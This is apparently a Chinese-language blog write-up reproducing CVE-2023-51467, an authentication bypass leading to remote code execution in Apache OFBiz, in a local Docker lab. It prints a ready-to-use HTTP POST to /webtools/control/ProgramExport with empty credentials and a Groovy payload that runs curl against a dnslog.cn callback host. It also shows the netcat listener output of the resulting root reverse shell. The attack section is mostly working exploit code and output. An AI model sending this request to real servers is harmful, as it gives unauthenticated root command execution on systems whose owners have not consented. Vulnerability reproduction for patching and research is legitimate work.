CVE-2023-51467

CVE-2023-51467

漏洞原理:

Apache OFBiz是一个著名的电子商务平台,提供了最新的J2EE/XML规范和标准。此漏洞是因为CVE-2023-49070的不完全修复。在Apache OFBiz 18.12.10版本中,官方移除了可能导致RCE漏洞的XMLRPC组件,但没有修复权限绕过问题。

影响版本:

Apache OFBiz < 18.12.11

漏洞复现:

使用docker在本地搭建环境

访问登录界面:https://localhost:8443/accounting/control/main

image-20240907010646071

EXP

直接发送如下请求使用Groovy脚本执行命令,发现有命令执行

image-20240907011239049

Dnslog验证

1
2
3
4
5
6
7
8
9
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram='curl+tszq6q.dnslog.cn'.execute();

image-20240907012141066

反弹shell

image-20240907014234392

成功反弹shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
nc -lvnp 443
listening on [any] 443 ...
connect to [172.21.79.212] from (UNKNOWN) [172.21.64.1] 55569
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@7ac322be9f55:/usr/src/apache-ofbiz# whoami
whoami
root
root@7ac322be9f55:/usr/src/apache-ofbiz# id
id
uid=0(root) gid=0(root) groups=0(root)
root@7ac322be9f55:/usr/src/apache-ofbiz# pwd
pwd
/usr/src/apache-ofbiz
root@7ac322be9f55:/usr/src/apache-ofbiz#

CVE-2023-51467
https://www.mrdang.icu/2024/09/07/CVE-2023-51467/
作者
Mr.Dang
发布于
2024年9月7日
许可协议